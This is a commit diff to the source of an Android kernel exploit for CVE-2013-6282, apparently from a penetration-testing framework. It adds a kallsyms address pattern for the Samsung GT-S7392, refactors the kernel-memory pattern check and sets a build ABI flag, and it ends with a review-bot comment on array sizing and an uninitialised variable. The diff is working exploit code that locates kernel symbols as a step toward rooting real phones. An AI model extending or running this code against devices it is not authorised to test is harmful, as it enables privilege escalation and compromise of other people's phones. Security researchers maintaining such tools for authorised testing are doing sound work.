
Commit 891fccb

committed
add pattern for GT-S7392
1 parent 07ce7f3 commit 891fccb


2 files changed

+16
-7
lines changed


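--- a/external/source/exploits/CVE-2013-6282/Makefile
+++ b/external/source/exploits/CVE-2013-6282/Makefile
@@ -2,7 +2,7 @@
 all: install
 
 build:
-ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
+ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16 APP_ABI=armeabi
 
 install: build
 mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2013-6282.so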

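--- a/external/source/exploits/CVE-2013-6282/exploit.c
+++ b/external/source/exploits/CVE-2013-6282/exploit.c
@@ -50,6 +50,11 @@ unsigned long pattern_kallsyms_addresses3[] = {
 0xc00081c0, /* _stext */
 0xc00081c0 /* __exception_text_start */
 };
+unsigned long pattern_kallsyms_addresses4[] = {
+0xc0008180,
+0xc0008180,
+0xc0008180
+};
 
 unsigned long *kallsymsmem = NULL;
 unsigned long kallsyms_num_syms;
@@ -134,13 +139,12 @@ unsigned long *kerneldump(unsigned long startaddr, unsigned long dumpsize) {
 return allocaddr;
 }
 
-int check_pattern(unsigned long *addr, unsigned long *pattern, int patternnum) {
+int check_pattern(unsigned long *addr, unsigned long firstval, unsigned long *pattern, int patternnum) {
 unsigned long val;
 unsigned long cnt;
 unsigned long i;
 
-read_value_at_address((unsigned long)addr, &val);
-if (val == pattern[0]) {
+if (firstval == pattern[0]) {
 cnt = 1;
 for (i = 1; i < patternnum; i++) {
 read_value_at_address((unsigned long)(&addr[i]), &val);
@@ -159,11 +163,16 @@ int check_pattern(unsigned long *addr, unsigned long *pattern, int patternnum) {
 }
 
 int check_kallsyms_header(unsigned long *addr) {
-if (check_pattern(addr, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
+unsigned long val;
+read_value_at_address((unsigned long)addr, &val);
+
+if (check_pattern(addr, val, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
+return 0;
+} else if (check_pattern(addr, val, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
 return 0;
-} else if (check_pattern(addr, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
+} else if (check_pattern(addr, val, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
 return 0;
-} else if (check_pattern(addr, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
+} else if (check_pattern(addr, val, pattern_kallsyms_addresses4, sizeof(pattern_kallsyms_addresses4) / 4) == 0) {
 return 0;
 }
 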
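Review bot: The new `pattern_kallsyms_addresses4` call in `check_kallsyms_header` repeats the `sizeof(...) / 4` element count, which silently assumes a 4-byte `unsigned long`. Now that four call sites use it, the count is better written as `sizeof(pattern_kallsyms_addresses4) / sizeof(pattern_kallsyms_addresses4[0])` (or one shared array-size macro) on all of them. The added `val` is also passed to `check_pattern` without any check that `read_value_at_address` filled it in; whether that call can fail is not visible here, so `unsigned long val = 0;` would be the minimal guard against comparing an indeterminate value. The new table has no comments, unlike the `/* _stext */` annotations just above it; a one-line comment such as `/* GT-S7392 */` over the array would record where the values come from. `check_kallsyms_header` continues past the end of the hunk.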
